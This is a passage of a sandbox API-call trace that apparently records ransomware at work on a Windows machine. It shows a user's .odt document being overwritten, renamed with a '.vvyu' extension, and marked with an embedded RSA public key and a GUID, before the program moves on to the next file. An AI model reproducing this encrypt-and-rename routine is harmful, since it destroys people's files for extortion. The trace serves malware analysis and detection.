RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.189] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2df8 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2de0 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.192] GetCurrentThreadId () returned 0x66c [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4f90 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.193] GetCurrentThreadId () returned 0x66c [0196.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2df8 [0196.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e58 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e70 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e10 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2de0 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1650 | out: hHeap=0x620000) returned 1 [0196.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.204] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x18060, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x18060, lpOverlapped=0x0) returned 1 [0196.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.206] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18065, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.206] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.207] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.208] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.208] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.208] CloseHandle (hObject=0x568) returned 1 [0196.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.210] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\FNDguil2uBhXleqMkv.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\fndguil2ubhxleqmkv.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\FNDguil2uBhXleqMkv.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\fndguil2ubhxleqmkv.odt.vvyu")) returned 1 [0196.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.212] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.216] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863f90f0, ftCreationTime.dwHighDateTime=0x1d8976a, ftLastAccessTime.dwLowDateTime=0xec128660, ftLastAccessTime.dwHighDateTime=0x1d89b22, ftLastWriteTime.dwLowDateTime=0xec128660, ftLastWriteTime.dwHighDateTime=0x1d89b22, nFileSizeHigh=0x0, nFileSizeLow=0x14074, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gGXI3yELl78C2wDp.pps", cAlternateFileName="GGXI3Y~1.PPS")) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.217] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\gGXI3yELl78C2wDp.pps") returned=".pps" [0196.217] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\gGXI3yELl78C2wDp.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ggxi3yell78c2wdp.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.218] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=82036) returned 1 [0196.218] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.221] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1404e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.221] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.223] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.223] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x14074, lpOverlapped=0x0) returned 1 [0196.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.224] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.225] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.225] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.225] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.225] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.226] GetLastError () returned 0x0 [0196.226] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.226] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.226] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.226] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.226] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14070) returned 0x2ea79b0 [0196.227] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, 